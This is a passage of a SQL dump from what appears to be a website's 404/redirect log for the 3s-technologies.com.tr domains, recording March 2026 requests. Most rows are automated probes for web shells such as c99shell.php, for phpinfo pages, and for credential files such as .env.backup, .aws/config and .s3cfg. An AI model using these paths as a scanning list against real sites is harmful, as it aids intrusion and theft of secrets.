00:00:00',301),(59185,'http://3s-technologies.com.tr/tr/quotqw4mu9n.php',NULL,'','',1,0,'2026-03-06 17:46:39','0000-00-00 00:00:00',301),(59186,'http://3s-technologies.com.tr/tr/rest-api.php',NULL,'','',1,0,'2026-03-06 17:46:42','0000-00-00 00:00:00',301),(59187,'http://3s-technologies.com.tr/tr/iikklegv.php',NULL,'','',1,0,'2026-03-06 17:46:43','0000-00-00 00:00:00',301),(59188,'http://3s-technologies.com.tr/tr/lcahmwsz.php',NULL,'','',1,0,'2026-03-06 17:46:43','0000-00-00 00:00:00',301),(59189,'http://3s-technologies.com.tr/tr/tuhixyxq.php',NULL,'','',1,0,'2026-03-06 17:46:45','0000-00-00 00:00:00',301),(59190,'http://3s-technologies.com.tr/tr/qvaqfalfctx.php',NULL,'','',1,0,'2026-03-06 17:46:48','0000-00-00 00:00:00',301),(59191,'http://3s-technologies.com.tr/tr/qysiwf6tjbv.php',NULL,'','',1,0,'2026-03-06 17:46:50','0000-00-00 00:00:00',301),(59192,'http://3s-technologies.com.tr/tr/xmrrpxgn.php',NULL,'','',1,0,'2026-03-06 17:46:52','0000-00-00 00:00:00',301),(59193,'http://3s-technologies.com.tr/tr/vtmlkgps.php',NULL,'','',1,0,'2026-03-06 17:46:52','0000-00-00 00:00:00',301),(59194,'http://3s-technologies.com.tr/tr/gnkadgiz.php',NULL,'','',1,0,'2026-03-06 17:46:54','0000-00-00 00:00:00',301),(59195,'http://3s-technologies.com.tr/tr/sqosuclx.php',NULL,'','',1,0,'2026-03-06 17:46:55','0000-00-00 00:00:00',301),(59196,'http://mail.3s-technologies.com.tr/tr/gptsh.php',NULL,'','',27,0,'2026-03-07 05:54:51','0000-00-00 00:00:00',301),(59197,'http://mail.3s-technologies.com.tr/tr/albin.php',NULL,'','',24,0,'2026-03-07 05:54:52','0000-00-00 00:00:00',301),(59198,'http://mail.3s-technologies.com.tr/tr/yos.php',NULL,'','',3,0,'2026-03-07 05:54:53','0000-00-00 00:00:00',301),(59199,'http://mail.3s-technologies.com.tr/tr/utky.php',NULL,'','',8,0,'2026-03-07 05:54:54','0000-00-00 00:00:00',301),(59200,'http://mail.3s-technologies.com.tr/tr/settings.php',NULL,'','',7,0,'2026-03-07 05:54:54','0000-00-00 00:00:00',301),(59201,'http://mail.3s-technologies.com.tr/tr/fsgdjkl.php',NULL,'','',7,0,'2026-03-07 05:54:55','0000-00-00 00:00:00',301),(59202,'http://mail.3s-technologies.com.tr/tr/by.php',NULL,'','',5,0,'2026-03-07 05:54:57','0000-00-00 00:00:00',301),(59203,'http://mail.3s-technologies.com.tr/tr/asw.php',NULL,'','',4,0,'2026-03-07 05:54:59','0000-00-00 00:00:00',301),(59204,'http://mail.3s-technologies.com.tr/tr/no1.php',NULL,'','',16,0,'2026-03-07 05:55:02','0000-00-00 00:00:00',301),(59205,'http://mail.3s-technologies.com.tr/tr/teee.php',NULL,'','',4,0,'2026-03-07 05:55:03','0000-00-00 00:00:00',301),(59206,'http://mail.3s-technologies.com.tr/tr/elabel.php',NULL,'','',3,0,'2026-03-07 05:55:04','0000-00-00 00:00:00',301),(59207,'http://mail.3s-technologies.com.tr/tr/baffz.php',NULL,'','',3,0,'2026-03-07 05:55:05','0000-00-00 00:00:00',301),(59208,'http://mail.3s-technologies.com.tr/tr/jocundly.php',NULL,'','',3,0,'2026-03-07 05:55:06','0000-00-00 00:00:00',301),(59209,'http://mail.3s-technologies.com.tr/tr/h2h.php',NULL,'','',4,0,'2026-03-07 05:55:08','0000-00-00 00:00:00',301),(59210,'http://mail.3s-technologies.com.tr/tr/rithin.php',NULL,'','',25,0,'2026-03-07 05:55:08','0000-00-00 00:00:00',301),(59211,'http://mail.3s-technologies.com.tr/tr/pass2.php',NULL,'','',3,0,'2026-03-07 05:55:27','0000-00-00 00:00:00',301),(59212,'http://3s-technologies.com.tr/en/themes/tenant/css/purple-login.css',NULL,'','',1,0,'2026-03-07 11:46:22','0000-00-00 00:00:00',301),(59213,'http://3s-technologies.com.tr/tr/gptsh.php',NULL,'','',53,0,'2026-03-07 14:00:12','0000-00-00 00:00:00',301),(59214,'http://3s-technologies.com.tr/tr/albin.php',NULL,'','',43,0,'2026-03-07 14:00:13','0000-00-00 00:00:00',301),(59215,'http://3s-technologies.com.tr/tr/utky.php',NULL,'','',8,0,'2026-03-07 14:00:14','0000-00-00 00:00:00',301),(59216,'http://3s-technologies.com.tr/tr/fsgdjkl.php',NULL,'','',12,0,'2026-03-07 14:00:15','0000-00-00 00:00:00',301),(59217,'http://3s-technologies.com.tr/tr/x12.php',NULL,'','',9,0,'2026-03-07 14:00:16','0000-00-00 00:00:00',301),(59218,'http://3s-technologies.com.tr/tr/hoket.php',NULL,'','',1,0,'2026-03-07 21:31:21','0000-00-00 00:00:00',301),(59219,'http://3s-technologies.com.tr/tr/kct.php',NULL,'','',2,0,'2026-03-09 05:49:06','0000-00-00 00:00:00',301),(59220,'http://3s-technologies.com.tr/tr/c99shell.php',NULL,'','',2,0,'2026-03-09 05:49:08','0000-00-00 00:00:00',301),(59221,'http://3s-technologies.com.tr/tr/del.php',NULL,'','',2,0,'2026-03-09 05:49:08','0000-00-00 00:00:00',301),(59222,'http://3s-technologies.com.tr/tr/dev/info.php',NULL,'','',1,0,'2026-03-09 05:49:15','0000-00-00 00:00:00',301),(59223,'http://3s-technologies.com.tr/tr/temp/info.php',NULL,'','',1,0,'2026-03-09 05:49:17','0000-00-00 00:00:00',301),(59224,'http://3s-technologies.com.tr/tr/xinfo.php',NULL,'','',3,0,'2026-03-09 05:49:18','0000-00-00 00:00:00',301),(59225,'http://3s-technologies.com.tr/tr/adm/info.php',NULL,'','',1,0,'2026-03-09 05:49:20','0000-00-00 00:00:00',301),(59226,'http://3s-technologies.com.tr/tr/site/i.php',NULL,'','',1,0,'2026-03-09 05:49:22','0000-00-00 00:00:00',301),(59227,'http://3s-technologies.com.tr/tr/erp/i.php',NULL,'','',1,0,'2026-03-09 05:49:24','0000-00-00 00:00:00',301),(59228,'http://3s-technologies.com.tr/tr/docs/i.php',NULL,'','',1,0,'2026-03-09 05:49:25','0000-00-00 00:00:00',301),(59229,'http://mail.3s-technologies.com.tr/tr/wp-scxy.php',NULL,'','',1,0,'2026-03-09 16:58:22','0000-00-00 00:00:00',301),(59230,'http://3s-technologies.com.tr/tr/wp-includes/widgets/txets.php',NULL,'http://3s-technologies.com.tr/wp-includes/widgets/txets.php','',1,0,'2026-03-09 17:20:58','0000-00-00 00:00:00',301),(59231,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/txets.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/txets.php','',1,0,'2026-03-09 17:20:59','0000-00-00 00:00:00',301),(59232,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-template/txets.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-template/txets.php','',1,0,'2026-03-09 17:21:00','0000-00-00 00:00:00',301),(59233,'http://3s-technologies.com.tr/tr/wp-content/memberfuns.php',NULL,'http://3s-technologies.com.tr/wp-content/memberfuns.php','',1,0,'2026-03-09 17:21:03','0000-00-00 00:00:00',301),(59234,'http://3s-technologies.com.tr/tr/wp-admin/memberfuns.php',NULL,'http://3s-technologies.com.tr/wp-admin/memberfuns.php','',1,0,'2026-03-09 17:21:04','0000-00-00 00:00:00',301),(59235,'http://3s-technologies.com.tr/tr/wp-content/hplfuns.php',NULL,'http://3s-technologies.com.tr/wp-content/hplfuns.php','',1,0,'2026-03-09 17:21:12','0000-00-00 00:00:00',301),(59236,'http://3s-technologies.com.tr/tr/wp-admin/userfuns.php',NULL,'http://3s-technologies.com.tr/wp-admin/userfuns.php','',1,0,'2026-03-09 17:21:13','0000-00-00 00:00:00',301),(59237,'http://3s-technologies.com.tr/tr/onclickfuns.php',NULL,'http://3s-technologies.com.tr/onclickfuns.php','',8,0,'2026-03-09 17:21:24','0000-00-00 00:00:00',301),(59238,'http://3s-technologies.com.tr/tr/qinfofuns.php',NULL,'http://3s-technologies.com.tr/qinfofuns.php','',1,0,'2026-03-09 17:21:25','0000-00-00 00:00:00',301),(59239,'https://3s-technologies.com.tr/en/wp-json/wc/store/cart',NULL,'','',1,0,'2026-03-10 01:39:11','0000-00-00 00:00:00',301),(59240,'https://3s-technologies.com.tr/en/wp-json/wc/store/payment-methods',NULL,'','',1,0,'2026-03-10 01:39:14','0000-00-00 00:00:00',301),(59241,'https://3s-technologies.com.tr/en/wp-json/wc/store/products?stock_status=instock&order=asc&orderby=price&min_price=1&max_price=99999999&page=1&per_page=100&type=simple',NULL,'','',1,0,'2026-03-10 01:39:15','0000-00-00 00:00:00',301),(59242,'https://3s-technologies.com.tr/en/checkout',NULL,'','',1,0,'2026-03-10 01:39:17','0000-00-00 00:00:00',301),(59243,'https://3s-technologies.com.tr/en/cart',NULL,'','',1,0,'2026-03-10 01:39:18','0000-00-00 00:00:00',301),(59244,'https://3s-technologies.com.tr/en/shop',NULL,'','',1,0,'2026-03-10 01:39:20','0000-00-00 00:00:00',301),(59245,'https://3s-technologies.com.tr/en/store',NULL,'','',1,0,'2026-03-10 01:39:21','0000-00-00 00:00:00',301),(59246,'https://3s-technologies.com.tr/en/products',NULL,'','',2,0,'2026-03-10 01:39:23','0000-00-00 00:00:00',301),(59247,'https://3s-technologies.com.tr/en/donate',NULL,'','',1,0,'2026-03-10 01:39:24','0000-00-00 00:00:00',301),(59248,'https://3s-technologies.com.tr/en/donation',NULL,'','',1,0,'2026-03-10 01:39:26','0000-00-00 00:00:00',301),(59249,'https://3s-technologies.com.tr/en/give',NULL,'','',1,0,'2026-03-10 01:39:27','0000-00-00 00:00:00',301),(59250,'https://3s-technologies.com.tr/en/membership',NULL,'','',1,0,'2026-03-10 01:39:29','0000-00-00 00:00:00',301),(59251,'https://3s-technologies.com.tr/en/subscribe',NULL,'','',1,0,'2026-03-10 01:39:31','0000-00-00 00:00:00',301),(59252,'https://3s-technologies.com.tr/en/join',NULL,'','',1,0,'2026-03-10 01:39:34','0000-00-00 00:00:00',301),(59253,'http://3s-technologies.com.tr/tr/admin/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2026-03-10 08:11:34','0000-00-00 00:00:00',301),(59254,'http://3s-technologies.com.tr/tr/awh.php',NULL,'','',16,0,'2026-03-10 12:47:07','0000-00-00 00:00:00',301),(59255,'http://3s-technologies.com.tr/tr/wp11.php',NULL,'','',5,0,'2026-03-10 12:47:07','0000-00-00 00:00:00',301),(59256,'http://3s-technologies.com.tr/tr/oirsbfkm.php',NULL,'','',1,0,'2026-03-10 12:47:08','0000-00-00 00:00:00',301),(59257,'http://3s-technologies.com.tr/tr/leon.php',NULL,'','',2,0,'2026-03-10 12:47:12','0000-00-00 00:00:00',301),(59258,'http://3s-technologies.com.tr/tr/nw_ok.php',NULL,'','',2,0,'2026-03-10 12:47:13','0000-00-00 00:00:00',301),(59259,'http://3s-technologies.com.tr/tr/aifa.php',NULL,'','',12,0,'2026-03-10 12:47:14','0000-00-00 00:00:00',301),(59260,'http://3s-technologies.com.tr/tr/cash.php',NULL,'','',3,0,'2026-03-10 12:47:14','0000-00-00 00:00:00',301),(59261,'http://3s-technologies.com.tr/tr/742.php',NULL,'','',2,0,'2026-03-10 12:47:15','0000-00-00 00:00:00',301),(59262,'http://3s-technologies.com.tr/tr/wziar1.php',NULL,'','',13,0,'2026-03-10 12:47:16','0000-00-00 00:00:00',301),(59263,'https://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/readme.txt',NULL,'https://3s-technologies.com.tr/wp-content/plugins/woocommerce/readme.txt','',1,0,'2026-03-10 20:00:21','0000-00-00 00:00:00',301),(59264,'http://3s-technologies.com.tr/en/fxfowcvz.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-03-10 21:54:02','0000-00-00 00:00:00',301),(59265,'https://3s-technologies.com.tr/en/euhtebkv.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-03-10 21:54:03','0000-00-00 00:00:00',301),(59266,'http://3s-technologies.com.tr/en/sponsorship-campaigns.html',NULL,'','',1,0,'2026-03-11 04:00:39','0000-00-00 00:00:00',301),(59267,'http://mail.3s-technologies.com.tr/tr/maa.php',NULL,'','',1,0,'2026-03-11 05:16:59','0000-00-00 00:00:00',301),(59268,'http://3s-technologies.com.tr/tr/0771dccd2958b85d48125d146d77e038akc.php',NULL,'','',3,0,'2026-03-11 11:39:19','0000-00-00 00:00:00',301),(59269,'http://3s-technologies.com.tr/tr/we-es-o.php',NULL,'','',1,0,'2026-03-11 11:39:22','0000-00-00 00:00:00',301),(59270,'http://3s-technologies.com.tr/tr/wgift1.php',NULL,'','',27,0,'2026-03-11 11:39:22','0000-00-00 00:00:00',301),(59271,'http://mail.3s-technologies.com.tr/tr/hots.php',NULL,'','',7,0,'2026-03-11 13:53:01','0000-00-00 00:00:00',301),(59272,'http://mail.3s-technologies.com.tr/tr/public/ws49.php',NULL,'','',7,0,'2026-03-11 13:53:30','0000-00-00 00:00:00',301),(59273,'http://mail.3s-technologies.com.tr/tr/wp-png.php',NULL,'','',23,0,'2026-03-11 13:53:39','0000-00-00 00:00:00',301),(59274,'http://mail.3s-technologies.com.tr/tr/intall.php',NULL,'','',1,0,'2026-03-11 13:53:41','0000-00-00 00:00:00',301),(59275,'http://mail.3s-technologies.com.tr/tr/byypas.php',NULL,'','',25,0,'2026-03-11 13:53:43','0000-00-00 00:00:00',301),(59276,'http://mail.3s-technologies.com.tr/tr/abrand.php',NULL,'','',9,0,'2026-03-11 13:53:44','0000-00-00 00:00:00',301),(59277,'http://mail.3s-technologies.com.tr/tr/camara.php',NULL,'','',1,0,'2026-03-11 13:53:45','0000-00-00 00:00:00',301),(59278,'http://mail.3s-technologies.com.tr/tr/ws83.php',NULL,'','',12,0,'2026-03-11 13:53:47','0000-00-00 00:00:00',301),(59279,'http://mail.3s-technologies.com.tr/tr/の.php',NULL,'','',1,0,'2026-03-11 13:53:48','0000-00-00 00:00:00',301),(59280,'http://mail.3s-technologies.com.tr/tr/zz8.php',NULL,'','',5,0,'2026-03-11 13:53:50','0000-00-00 00:00:00',301),(59281,'http://mail.3s-technologies.com.tr/tr/a5.php',NULL,'','',43,0,'2026-03-11 13:53:51','0000-00-00 00:00:00',301),(59282,'http://mail.3s-technologies.com.tr/tr/ai.php',NULL,'','',3,0,'2026-03-11 13:53:52','0000-00-00 00:00:00',301),(59283,'http://mail.3s-technologies.com.tr/tr/amwxl.php',NULL,'','',3,0,'2026-03-11 13:53:52','0000-00-00 00:00:00',301),(59284,'http://mail.3s-technologies.com.tr/tr/awdld.php',NULL,'','',1,0,'2026-03-11 13:53:53','0000-00-00 00:00:00',301),(59285,'http://mail.3s-technologies.com.tr/tr/bkyac.php',NULL,'','',3,0,'2026-03-11 13:53:54','0000-00-00 00:00:00',301),(59286,'http://mail.3s-technologies.com.tr/tr/krntz.php',NULL,'','',1,0,'2026-03-11 13:53:55','0000-00-00 00:00:00',301),(59287,'http://mail.3s-technologies.com.tr/tr/vhwwnrnmqc.php',NULL,'','',1,0,'2026-03-11 13:53:56','0000-00-00 00:00:00',301),(59288,'http://mail.3s-technologies.com.tr/tr/vaza.php',NULL,'','',6,0,'2026-03-11 13:53:57','0000-00-00 00:00:00',301),(59289,'http://mail.3s-technologies.com.tr/tr/drhunthq.php',NULL,'','',7,0,'2026-03-11 13:53:59','0000-00-00 00:00:00',301),(59290,'http://mail.3s-technologies.com.tr/tr/ws84.php',NULL,'','',15,0,'2026-03-11 13:54:02','0000-00-00 00:00:00',301),(59291,'http://mail.3s-technologies.com.tr/tr/lclnqiii.php',NULL,'','',1,0,'2026-03-11 13:54:03','0000-00-00 00:00:00',301),(59292,'http://mail.3s-technologies.com.tr/tr/wp-tap.php',NULL,'','',1,0,'2026-03-11 13:54:05','0000-00-00 00:00:00',301),(59293,'http://mail.3s-technologies.com.tr/tr/vrhiw.php',NULL,'','',1,0,'2026-03-11 13:54:06','0000-00-00 00:00:00',301),(59294,'http://mail.3s-technologies.com.tr/tr/qqjki.php',NULL,'','',1,0,'2026-03-11 13:54:07','0000-00-00 00:00:00',301),(59295,'http://3s-technologies.com.tr/tr/hots.php',NULL,'','',17,0,'2026-03-11 14:08:10','0000-00-00 00:00:00',301),(59296,'http://3s-technologies.com.tr/tr/public/ws49.php',NULL,'','',14,0,'2026-03-11 14:08:38','0000-00-00 00:00:00',301),(59297,'http://3s-technologies.com.tr/tr/wp-png.php',NULL,'','',36,0,'2026-03-11 14:08:48','0000-00-00 00:00:00',301),(59298,'http://3s-technologies.com.tr/tr/intall.php',NULL,'','',4,0,'2026-03-11 14:08:50','0000-00-00 00:00:00',301),(59299,'http://3s-technologies.com.tr/tr/byypas.php',NULL,'','',39,0,'2026-03-11 14:08:52','0000-00-00 00:00:00',301),(59300,'http://3s-technologies.com.tr/tr/camara.php',NULL,'','',4,0,'2026-03-11 14:08:53','0000-00-00 00:00:00',301),(59301,'http://3s-technologies.com.tr/tr/ws83.php',NULL,'','',27,0,'2026-03-11 14:08:55','0000-00-00 00:00:00',301),(59302,'http://3s-technologies.com.tr/tr/の.php',NULL,'','',2,0,'2026-03-11 14:08:56','0000-00-00 00:00:00',301),(59303,'http://3s-technologies.com.tr/tr/amwxl.php',NULL,'','',7,0,'2026-03-11 14:09:01','0000-00-00 00:00:00',301),(59304,'http://3s-technologies.com.tr/tr/awdld.php',NULL,'','',4,0,'2026-03-11 14:09:01','0000-00-00 00:00:00',301),(59305,'http://3s-technologies.com.tr/tr/bkyac.php',NULL,'','',9,0,'2026-03-11 14:09:02','0000-00-00 00:00:00',301),(59306,'http://3s-technologies.com.tr/tr/krntz.php',NULL,'','',4,0,'2026-03-11 14:09:03','0000-00-00 00:00:00',301),(59307,'http://3s-technologies.com.tr/tr/vhwwnrnmqc.php',NULL,'','',4,0,'2026-03-11 14:09:04','0000-00-00 00:00:00',301),(59308,'http://3s-technologies.com.tr/tr/8573.php',NULL,'','',41,0,'2026-03-11 14:09:06','0000-00-00 00:00:00',301),(59309,'http://3s-technologies.com.tr/tr/drhunthq.php',NULL,'','',16,0,'2026-03-11 14:09:07','0000-00-00 00:00:00',301),(59310,'http://3s-technologies.com.tr/tr/ws84.php',NULL,'','',32,0,'2026-03-11 14:09:09','0000-00-00 00:00:00',301),(59311,'http://3s-technologies.com.tr/tr/lclnqiii.php',NULL,'','',4,0,'2026-03-11 14:09:11','0000-00-00 00:00:00',301),(59312,'http://3s-technologies.com.tr/tr/wp-tap.php',NULL,'','',4,0,'2026-03-11 14:09:14','0000-00-00 00:00:00',301),(59313,'http://3s-technologies.com.tr/tr/vrhiw.php',NULL,'','',4,0,'2026-03-11 14:09:14','0000-00-00 00:00:00',301),(59314,'http://3s-technologies.com.tr/tr/qqjki.php',NULL,'','',4,0,'2026-03-11 14:09:15','0000-00-00 00:00:00',301),(59315,'http://3s-technologies.com.tr/tr/ta0ol.php',NULL,'','',30,0,'2026-03-11 16:21:11','0000-00-00 00:00:00',301),(59316,'http://3s-technologies.com.tr/tr/phina.php',NULL,'','',4,0,'2026-03-11 16:21:13','0000-00-00 00:00:00',301),(59317,'http://3s-technologies.com.tr/tr/xc0252.php',NULL,'','',8,0,'2026-03-11 16:21:17','0000-00-00 00:00:00',301),(59318,'http://3s-technologies.com.tr/tr/ws47.php',NULL,'','',5,0,'2026-03-11 16:21:20','0000-00-00 00:00:00',301),(59319,'http://3s-technologies.com.tr/tr/vvvb.php',NULL,'','',5,0,'2026-03-11 16:21:21','0000-00-00 00:00:00',301),(59320,'http://3s-technologies.com.tr/tr/blog/222.php',NULL,'','',1,0,'2026-03-11 16:21:24','0000-00-00 00:00:00',301),(59321,'https://mail.3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/vmprices.js?vmver=1ca80efd\"',NULL,'https://mail.3s-technologies.com.tr/%22/components/com_virtuemart/assets/js/vmprices.js?vmver=1ca80efd\"','',3,0,'2026-03-12 02:54:53','0000-00-00 00:00:00',301),(59322,'https://mail.3s-technologies.com.tr/tr/\"/media/jui/js/jquery-noconflict.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/jui/js/jquery-noconflict.js?59b9a97f81c129b0e3167385c8580231\"','',2,0,'2026-03-12 02:54:55','0000-00-00 00:00:00',301),(59323,'https://www.3s-technologies.com.tr/tr/\"/media/system/js/core.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/system/js/core.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-03-12 04:55:57','0000-00-00 00:00:00',301),(59324,'https://www.3s-technologies.com.tr/tr/\"/media/system/js/mootools-more.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/system/js/mootools-more.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59325,'https://www.3s-technologies.com.tr/tr/\"/modules/mod_djimageslider/assets/js/slider.js?v=4.1.1\"',NULL,'https://www.3s-technologies.com.tr/%22/modules/mod_djimageslider/assets/js/slider.js?v=4.1.1\"','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59326,'https://www.3s-technologies.com.tr/tr/\"/templates/beez5/javascript/md_stylechanger.js\"',NULL,'https://www.3s-technologies.com.tr/%22/templates/beez5/javascript/md_stylechanger.js%22','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59327,'https://www.3s-technologies.com.tr/tr/\"/media/jui/js/jquery-migrate.min.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/jui/js/jquery-migrate.min.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59328,'https://www.3s-technologies.com.tr/tr/\"/media/system/js/caption.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/system/js/caption.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59329,'https://www.3s-technologies.com.tr/tr/\"/media/jui/js/jquery-noconflict.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/jui/js/jquery-noconflict.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59330,'https://www.3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/vmsite.js?vmver=1ca80efd\"',NULL,'https://www.3s-technologies.com.tr/%22/components/com_virtuemart/assets/js/vmsite.js?vmver=1ca80efd\"','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59331,'https://www.3s-technologies.com.tr/tr/\"/templates/beez5/javascript/hide.js\"',NULL,'https://www.3s-technologies.com.tr/%22/templates/beez5/javascript/hide.js%22','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59332,'https://www.3s-technologies.com.tr/tr/\"/media/system/js/mootools-core.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/system/js/mootools-core.js?59b9a97f81c129b0e3167385c8580231\"','',2,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59333,'https://www.3s-technologies.com.tr/tr/\"/modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=1ca80efd\"',NULL,'https://www.3s-technologies.com.tr/%22/modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=1ca80efd\"','',3,0,'2026-03-12 04:55:58','0000-00-00 00:00:00',301),(59334,'https://www.3s-technologies.com.tr/tr/\"/media/jui/js/jquery.min.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://www.3s-technologies.com.tr/%22/media/jui/js/jquery.min.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-03-12 04:55:59','0000-00-00 00:00:00',301),(59335,'https://www.3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/vmprices.js?vmver=1ca80efd\"',NULL,'https://www.3s-technologies.com.tr/%22/components/com_virtuemart/assets/js/vmprices.js?vmver=1ca80efd\"','',3,0,'2026-03-12 04:55:59','0000-00-00 00:00:00',301),(59336,'https://www.3s-technologies.com.tr/tr/\"/media/djextensions/jquery-easing/jquery.easing.min.js\"',NULL,'https://www.3s-technologies.com.tr/%22/media/djextensions/jquery-easing/jquery.easing.min.js%22','',2,0,'2026-03-12 04:55:59','0000-00-00 00:00:00',301),(59337,'https://www.3s-technologies.com.tr/tr/.env.backup',NULL,'https://www.3s-technologies.com.tr/.env.backup','',2,0,'2026-03-12 04:56:01','0000-00-00 00:00:00',301),(59338,'https://www.3s-technologies.com.tr/tr/config.js',NULL,'https://www.3s-technologies.com.tr/config.js','',2,0,'2026-03-12 04:56:03','0000-00-00 00:00:00',301),(59339,'https://www.3s-technologies.com.tr/tr/aws-config.js',NULL,'https://www.3s-technologies.com.tr/aws-config.js','',2,0,'2026-03-12 04:56:03','0000-00-00 00:00:00',301),(59340,'https://www.3s-technologies.com.tr/tr/aws.config.js',NULL,'https://www.3s-technologies.com.tr/aws.config.js','',2,0,'2026-03-12 04:56:03','0000-00-00 00:00:00',301),(59341,'https://www.3s-technologies.com.tr/tr/_debugbar',NULL,'https://www.3s-technologies.com.tr/_debugbar/','',2,0,'2026-03-12 04:56:04','0000-00-00 00:00:00',301),(59342,'https://www.3s-technologies.com.tr/tr/debugbar',NULL,'https://www.3s-technologies.com.tr/debugbar/','',2,0,'2026-03-12 04:56:04','0000-00-00 00:00:00',301),(59343,'https://www.3s-technologies.com.tr/tr/debug',NULL,'https://www.3s-technologies.com.tr/debug/','',2,0,'2026-03-12 04:56:05','0000-00-00 00:00:00',301),(59344,'https://www.3s-technologies.com.tr/tr/.aws/config',NULL,'https://www.3s-technologies.com.tr/.aws/config','',2,0,'2026-03-12 04:56:08','0000-00-00 00:00:00',301),(59345,'https://www.3s-technologies.com.tr/tr/aws-credentials',NULL,'https://www.3s-technologies.com.tr/aws-credentials','',2,0,'2026-03-12 04:56:08','0000-00-00 00:00:00',301),(59346,'https://www.3s-technologies.com.tr/tr/aws.json',NULL,'https://www.3s-technologies.com.tr/aws.json','',2,0,'2026-03-12 04:56:09','0000-00-00 00:00:00',301),(59347,'https://www.3s-technologies.com.tr/tr/.s3cfg',NULL,'https://www.3s-technologies.com.tr/.s3cfg','',2,0,'2026-03-12 04:56:09','0000-00-00 00:00:00',301),(59348,'http://3s-technologies.com.tr/tr/fyiiz.php',NULL,'','',7,0,'2026-03-12 07:26:13','0000-00-00 00:00:00',301),(59349,'http://3s-technologies.com.tr/tr/595.php',NULL,'','',3,0,'2026-03-12 07:26:16','0000-00-00 00:00:00',301),(59350,'http://3s-technologies.com.tr/tr/scbpb.php',NULL,'','',1,0,'2026-03-12 07:26:19','0000-00-00 00:00:00',301),(59351,'http://3s-technologies.com.tr/tr/xvs.php',NULL,'','',7,0,'2026-03-12 07:26:22','0000-00-00 00:00:00',301),(59352,'http://3s-technologies.com.tr/tr/fss.php',NULL,'','',4,0,'2026-03-12 07:26:23','0000-00-00 00:00:00',301),(59353,'http://3s-technologies.com.tr/tr/xwx1.php',NULL,'','',85,0,'2026-03-12 07:26:24','0000-00-00 00:00:00',301),(59354,'http://3s-technologies.com.tr/tr/gkl.php',NULL,'','',1,0,'2026-03-12 07:26:26','0000-00-00 00:00:00',301),(59355,'http://3s-technologies.com.tr/tr/wp-includes/app.php',NULL,'','',8,0,'2026-03-12 07:26:31','0000-00-00 00:00:00',301),(59356,'http://3s-technologies.com.tr/tr/vfr.php',NULL,'','',1,0,'2026-03-12 07:26:36','0000-00-00 00:00:00',301),(59357,'http://3s-technologies.com.tr/tr/zogy1.php',NULL,'','',22,0,'2026-03-12 07:26:38','0000-00-00 00:00:00',301),(59358,'http://3s-technologies.com.tr/tr/zoper1.php',NULL,'','',29,0,'2026-03-12 07:26:39','0000-00-00 00:00:00',301),(59359,'http://3s-technologies.com.tr/tr/wp-admin/maint/jcrop.php',NULL,'','',7,0,'2026-03-12 07:26:40','0000-00-00 00:00:00',301),(59360,'http://3s-technologies.com.tr/tr/acjsn.php',NULL,'','',1,0,'2026-03-12 07:26:42','0000-00-00 00:00:00',301),(59361,'http://3s-technologies.com.tr/tr/adnks.php',NULL,'','',1,0,'2026-03-12 07:26:42','0000-00-00 00:00:00',301),(59362,'http://3s-technologies.com.tr/tr/ahiqq.php',NULL,'','',1,0,'2026-03-12 07:26:43','0000-00-00 00:00:00',301),(59363,'http://3s-technologies.com.tr/tr/an9.php',NULL,'','',1,0,'2026-03-12 07:26:45','0000-00-00 00:00:00',301),(59364,'http://3s-technologies.com.tr/tr/aqups.php',NULL,'','',1,0,'2026-03-12 07:26:45','0000-00-00 00:00:00',301),(59365,'http://3s-technologies.com.tr/tr/bpltp.php',NULL,'','',1,0,'2026-03-12 07:26:46','0000-00-00 00:00:00',301),(59366,'http://3s-technologies.com.tr/tr/byp9.php',NULL,'','',1,0,'2026-03-12 07:26:47','0000-00-00 00:00:00',301),(59367,'http://3s-technologies.com.tr/tr/fs9.php',NULL,'','',3,0,'2026-03-12 07:26:48','0000-00-00 00:00:00',301),(59368,'http://3s-technologies.com.tr/tr/genco.php',NULL,'','',2,0,'2026-03-12 07:26:48','0000-00-00 00:00:00',301),(59369,'http://3s-technologies.com.tr/tr/p23duw.php',NULL,'','',1,0,'2026-03-12 07:26:49','0000-00-00 00:00:00',301),(59370,'http://3s-technologies.com.tr/tr/pu9.php',NULL,'','',1,0,'2026-03-12 07:26:50','0000-00-00 